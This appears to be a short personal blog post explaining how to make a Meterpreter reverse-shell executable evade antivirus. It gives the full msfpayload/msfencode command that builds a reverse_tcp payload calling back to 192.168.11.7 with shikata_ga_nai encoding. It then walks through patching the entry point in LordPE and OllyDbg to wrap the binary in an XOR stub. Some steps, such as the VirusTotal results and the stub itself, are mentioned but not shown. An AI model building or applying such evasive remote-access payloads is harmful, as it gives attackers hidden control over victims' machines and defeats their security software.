Still on holidays here, and in between sake, beer and shochu i found some time to read and check some things that i wanted to do for some time now. One of that was how to implement a simple binary xor in an .exe file especially for meterpreter. Meterpreter is great tool but is being detected from antivirus engines and that makes it difficult to use it as a standard payload.
Simple way to create one meterpreter binary that will connect back on ip 192.168.11.7:
C:\framework\msf3>ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.11.7 R | ruby msfencode -t exe -o meter_rever_tcp_192.exe -e x86/shikata_ga_nai
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
Virustotal result on the binary:
Originally we have the entry point at 6D42 with our Base Image at 40000, ( OEP loading the file at ollydbg was at 00406D42 )
We need the OEP to be placed at 0040BF60, so new entry point - base image ( 0040BF60 - 0040000 = BF60 )
After changing the EntryPoint we click Save, Ok and we close LordPE.
Right click, select copy to executable, selection and again right click on the new window and save file with a new name.
Finally we have our new XORed file.